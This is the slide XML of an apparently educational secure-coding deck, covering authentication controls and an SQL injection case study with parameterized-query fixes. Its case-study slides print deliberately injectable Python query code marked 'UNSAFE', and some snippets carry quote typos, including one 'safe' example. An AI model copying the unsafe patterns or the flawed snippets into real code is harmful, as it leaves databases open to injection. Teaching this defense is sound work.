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112"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId113"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="261" r:id="rId2"/>
    <p:sldId id="411" r:id="rId3"/>
    <p:sldId id="295" r:id="rId4"/>
    <p:sldId id="296" r:id="rId5"/>
    <p:sldId id="297" r:id="rId6"/>
    <p:sldId id="298" r:id="rId7"/>
    <p:sldId id="299" r:id="rId8"/>
    <p:sldId id="300" r:id="rId9"/>
    <p:sldId id="301" r:id="rId10"/>
    <p:sldId id="385" r:id="rId11"/>
    <p:sldId id="302" r:id="rId12"/>
    <p:sldId id="384" r:id="rId13"/>
    <p:sldId id="303" r:id="rId14"/>
    <p:sldId id="386" r:id="rId15"/>
    <p:sldId id="304" r:id="rId16"/>
    <p:sldId id="387" r:id="rId17"/>
    <p:sldId id="305" r:id="rId18"/>
    <p:sldId id="388" r:id="rId19"/>
    <p:sldId id="306" r:id="rId20"/>
    <p:sldId id="389" r:id="rId21"/>
    <p:sldId id="307" r:id="rId22"/>
    <p:sldId id="309" r:id="rId23"/>
    <p:sldId id="310" r:id="rId24"/>
    <p:sldId id="311" r:id="rId25"/>
    <p:sldId id="312" r:id="rId26"/>
    <p:sldId id="390" r:id="rId27"/>
    <p:sldId id="308" r:id="rId28"/>
    <p:sldId id="391" r:id="rId29"/>
    <p:sldId id="313" r:id="rId30"/>
    <p:sldId id="392" r:id="rId31"/>
    <p:sldId id="284" r:id="rId32"/>
    <p:sldId id="412" r:id="rId33"/>
    <p:sldId id="314" r:id="rId34"/>
    <p:sldId id="393" r:id="rId35"/>
    <p:sldId id="394" r:id="rId36"/>
    <p:sldId id="324" r:id="rId37"/>
    <p:sldId id="326" r:id="rId38"/>
    <p:sldId id="328" r:id="rId39"/>
    <p:sldId id="380" r:id="rId40"/>
    <p:sldId id="329" r:id="rId41"/>
    <p:sldId id="381" r:id="rId42"/>
    <p:sldId id="330" r:id="rId43"/>
    <p:sldId id="331" r:id="rId44"/>
    <p:sldId id="332" r:id="rId45"/>
    <p:sldId id="333" r:id="rId46"/>
    <p:sldId id="382" r:id="rId47"/>
    <p:sldId id="315" r:id="rId48"/>
    <p:sldId id="334" r:id="rId49"/>
    <p:sldId id="335" r:id="rId50"/>
    <p:sldId id="325" r:id="rId51"/>
    <p:sldId id="336" r:id="rId52"/>
    <p:sldId id="337" r:id="rId53"/>
    <p:sldId id="321" r:id="rId54"/>
    <p:sldId id="395" r:id="rId55"/>
    <p:sldId id="322" r:id="rId56"/>
    <p:sldId id="396" r:id="rId57"/>
    <p:sldId id="340" r:id="rId58"/>
    <p:sldId id="397" r:id="rId59"/>
    <p:sldId id="341" r:id="rId60"/>
    <p:sldId id="342" r:id="rId61"/>
    <p:sldId id="323" r:id="rId62"/>
    <p:sldId id="413" r:id="rId63"/>
    <p:sldId id="343" r:id="rId64"/>
    <p:sldId id="344" r:id="rId65"/>
    <p:sldId id="398" r:id="rId66"/>
    <p:sldId id="345" r:id="rId67"/>
    <p:sldId id="399" r:id="rId68"/>
    <p:sldId id="346" r:id="rId69"/>
    <p:sldId id="347" r:id="rId70"/>
    <p:sldId id="400" r:id="rId71"/>
    <p:sldId id="348" r:id="rId72"/>
    <p:sldId id="351" r:id="rId73"/>
    <p:sldId id="401" r:id="rId74"/>
    <p:sldId id="350" r:id="rId75"/>
    <p:sldId id="349" r:id="rId76"/>
    <p:sldId id="352" r:id="rId77"/>
    <p:sldId id="353" r:id="rId78"/>
    <p:sldId id="414" r:id="rId79"/>
    <p:sldId id="355" r:id="rId80"/>
    <p:sldId id="356" r:id="rId81"/>
    <p:sldId id="360" r:id="rId82"/>
    <p:sldId id="376" r:id="rId83"/>
    <p:sldId id="402" r:id="rId84"/>
    <p:sldId id="403" r:id="rId85"/>
    <p:sldId id="377" r:id="rId86"/>
    <p:sldId id="404" r:id="rId87"/>
    <p:sldId id="378" r:id="rId88"/>
    <p:sldId id="361" r:id="rId89"/>
    <p:sldId id="405" r:id="rId90"/>
    <p:sldId id="365" r:id="rId91"/>
    <p:sldId id="366" r:id="rId92"/>
    <p:sldId id="362" r:id="rId93"/>
    <p:sldId id="406" r:id="rId94"/>
    <p:sldId id="367" r:id="rId95"/>
    <p:sldId id="379" r:id="rId96"/>
    <p:sldId id="363" r:id="rId97"/>
    <p:sldId id="368" r:id="rId98"/>
    <p:sldId id="415" r:id="rId99"/>
    <p:sldId id="371" r:id="rId100"/>
    <p:sldId id="407" r:id="rId101"/>
    <p:sldId id="383" r:id="rId102"/>
    <p:sldId id="369" r:id="rId103"/>
    <p:sldId id="374" r:id="rId104"/>
    <p:sldId id="408" r:id="rId105"/>
    <p:sldId id="375" r:id="rId106"/>
    <p:sldId id="409" r:id="rId107"/>
    <p:sldId id="410" r:id="rId108"/>
    <p:sldId id="372" r:id="rId109"/>
    <p:sldId id="373" r:id="rId110"/>
    <p:sldId id="260"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40" autoAdjust="0"/>
    <p:restoredTop sz="96357" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="110" d="100"/>
          <a:sy n="110" d="100"/>
        </p:scale>
        <p:origin x="65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4/7/2020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4/7/2020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eflective Questions">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7" descr="header_strok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44880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="bub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 y="33129"/>
            <a:ext cx="9144000" cy="68580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hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302039"/>
            <a:ext cx="8460150" cy="4525963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="2000" baseline="0"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="742950" indent="-285750">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="009DDC"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr sz="1800" baseline="0"/>
            </a:lvl2pPr>
          </a:lstStyle>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#1</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#2</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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr baseline="0"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reflective Questions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54119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7"/>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 id="2147483953" r:id="rId25"/>
  </p:sldLayoutIdLst>
  <p:hf hd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www.hipaajournal.com/another-hipaa-breach-courtesy-of-a-printing-error-8205/" TargetMode="Externa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Limit Access Using Login and User Roles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Data in Transit and At Rest</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement Error Handling and Logging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Sensitive Data and Functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Protect Database Access </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implementing Common Protections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="223696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Authentication (Slide 2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19200"/>
            <a:ext cx="6897076" cy="5023338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use a centralized implementation for all of your authentication controls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Keep authentication logic separate from the resource being requested.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use redirection to and from the centralized authentication controls.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that authentication controls fail to the most secure state.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that administrative and account management functions are at least as secure as the primary authentication mechanism.</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10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{030C9899-0690-47AE-AE44-D1CC23715785}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-9832" y="1160208"/>
            <a:ext cx="1991032" cy="1151641"/>
            <a:chOff x="-2445" y="3873609"/>
            <a:chExt cx="2031700" cy="1175164"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Picture 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70D4C1E2-8AD8-4229-97B5-989671C9D393}"/>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4E2CD111-947E-47B7-898D-D885888ED226}"/>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Authentication</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8" descr="Image result for checklist png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9AFDECD-AC61-46D8-BDF0-F7404FC5E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17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100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Signs That Your Code May Have This Defect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Connects to an SQL database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forms a query directly from user input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Does not validate that the user input is acceptable before including in the query.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strategies for Correcting the Defect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Validate all user input on the server side and client side.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use prepared statements.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypt data in the database.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Case Study: SQL Injection Defect (Slide 2 of 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for sql injecti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001" y="4873044"/>
            <a:ext cx="1691074" cy="1691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08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101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># UNSAFE EXAMPLES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cursor.execute("SELECT admin FROM users WHERE username = '"+username+'");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cursor.execute("SELECT admin FROM users WHERE username = '%s' % username);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cursor.execute("SELECT admin FROM users WHERE username = '{}'".format(username));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cursor.execute(f"SELECT admin FROM users WHERE username = '{username}’”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t># SAFE EXAMPLES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cursor.execute("SELECT admin FROM users WHERE username = %s'",(username,));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cursor.execute("SELECT admin FROM users WHERE username = %(username)s",{'username':username});</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Case Study: SQL Injection Defect (Slide 3 of 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for sql injecti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001" y="4873044"/>
            <a:ext cx="1691074" cy="1691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986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102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL statements are text strings that include:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SQL keywords</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, such as SELECT, FROM, and WHERE.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that defines the data parameters of those operations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Quote characters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> used to separate string data from other parts of the statement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Strings that contain SQL statements are often constructed and manipulated dynamically through code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker can provide unexpected code elements as input, such as quotes, keywords, and other elements that change the logic of the SQL statement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Good input validation goes a long way toward protecting from this type of attack by making it so problematic characters like quotes will not be allowed as input.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Query Parameterization (Slide 1 of 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3877113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103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="8460150" cy="5327360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parameterized queries provide another layer of defense against SQL injection attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Parameterized queries impose a strong separation between SQL keywords and data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>They ensure that SQL code provided in data inputs will always be interpreted as data parameters—not as SQL code. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two common approaches to parameterizing queries are prepared statements and stored procedures.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Prepared statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL queries are written with placeholders instead of actual values.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You write the query and it is compiled in advance by the database management system.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To run the query later, you just pass values to be swapped into the placeholders.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data is kept distinct from SQL code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Query Parameterization (Slide 2 of 3)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2627409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104</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="341925" y="1302040"/>
            <a:ext cx="8460150" cy="5327360"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-- SQL query on the SQL server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>update_salary_query = """Update employee set Salary = %s where id = %s""“</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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 Python code to send input to the SQL query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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import mysql.connector </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from mysql.connector import Error </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pP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try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>     connection = mysql.connector.connect(host='localhost',</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                                          database='python_db',</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                                          user='pynative',</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
